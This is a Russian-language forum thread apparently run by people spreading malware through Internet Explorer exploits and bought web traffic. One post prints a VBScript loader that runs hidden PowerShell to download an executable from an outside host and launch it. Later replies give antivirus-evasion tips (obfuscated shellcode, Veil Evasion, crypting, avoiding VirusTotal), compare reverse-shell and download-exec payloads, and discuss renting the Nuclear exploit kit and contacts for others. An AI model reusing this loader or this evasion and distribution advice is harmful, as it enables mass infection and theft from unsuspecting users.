это вроди как фреймворк типа метасплоит, где нужно самому подбирать експлоиты и писать ротатор. с метасплоитом у меня не получилось вообще, такое впечатление что сплоиты в его составе устаревшие и не работают сейчас
Просто показалось что оно на https://github.com/offensive-security/exploit-database-bin-sploits построено.
Еще вопрос, подскажите кто спец. Кроме MSF я отдельно тестировал вот этот сплоит: https://www.exploit-db.com/exploits/35229/ К нему я прикрепил вот такой загрузчик: set shell=createobject("Shell.Application") shell.ShellExecute "PowerShell.exe", "-WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://mysite.com/download/mysoft.exe','mysoft.exe');Start-Process 'mysoft.exe'", "", "open", 1 При тестировании работало обалденно, пробивает мою 7-ю винду с IE 11, тестировал через crossbrowsertesting сервис - успешно пробивало IE 11, IE 9 на Win Vista и Win 7. Но, когда купил IE траф отсюда: redirect.com - то где-то 1000 просмотров пустил, и ни одной загрузки...вот почему....что не так.. Подскажите плз...или с трафом тем что-то не так...тогда где его брать..
Антивири очень строго относятся к схеме загрузил mysoft.exe => сразу запустил mysoft.exe Тем более ты скачиваешь стандартными утилитами винды. Ну это моё мнение.
Вопрос: какие Payloads в метасплоите более пробиваемы? Реверс-шелы или модуль download_exec? Если например взять какой-то реверс-шел и просто получить доступ к компам. А уже потом как-то дать всем команду грузить exe. Наверное это был бы более правильный способ чем сразу exe запускать?
Почисти шеллкод, обфусцируй его, наполни мусором, метасплоит умеет генерировать разный мусор, еще посмотри в сторону Veil Evasion фреймворк он в купе с метасплоитом работает. да и еще .exe свой тоже криптони и проверь на сервисе каком нибудь, только не вирустототал!
не,у меня такое ощущение что авторы как раз с метасплойта их и собирают) Если по теме уязвимостей и метасплойта то вот хороший китайский сайт http://www.metasploit.cn/forum.php Через гугл переводчик
Ясно) Оно хоть обновляется? На сайте битые ссылки, запустил ExploitPack.jar, просит обновиться до 5.01
http://exploitpack.com/dreadnought.zip должно автоматически обновиться потом,я честно говоря пока использую все-таки метасплойт,то этот пак часто барахлит
Автоматом не обновляется, а просто открывает браузер. Суть в другом, я там полазил внутри, обрати внимание на "эксплоит" ExploitPack/exploits/code/Windows-8.1-ahcache.sys.py Я ржал))
Посмотрел ссылки... Противоречивое впечатление Exploitpack, действительно неоригинальный какой-то, а стоит очень даже весомо )) exploitshop.wordpress устаревший (висит последняя заметка о MS12-020 Remote Code Execution Так я вот под него эксплоит до сих пор ищу, нигде нету) По поводу эксплоит-китов: Nuclear, конечно, рулит. Но его как найти, в даркнете, наверное, только...В паблике находил только исходники RIG и Blackhole их последних версий (последних уже навечно ). Круто было бы глянуть на хоть какие-нибудь паблик выкладки Nuclear'а, пусть и старые. P.S. Кстати, вы слышали что-нибудь про эксплоит-пак Microsoft Word Intruder ??? Недавно узнал про такой. Действует через скомпилированные вордовские доки (Ну действительно, актуально, удобно). Типа высокий пробив, в паблике экземпляров, якобы, нет...
А у тебя денег хватит хоть на нуклер? Готовь от 500 до 1800 зелени! нуклер не знаю где купить, мб на даркоде или на коровке... Могу помочь с контактами связки нейтрино
по поводу Nuclear насколько мне известно только аренда... около 700$ в неделю.. зависит от количества трафика которое пройдет через нее.
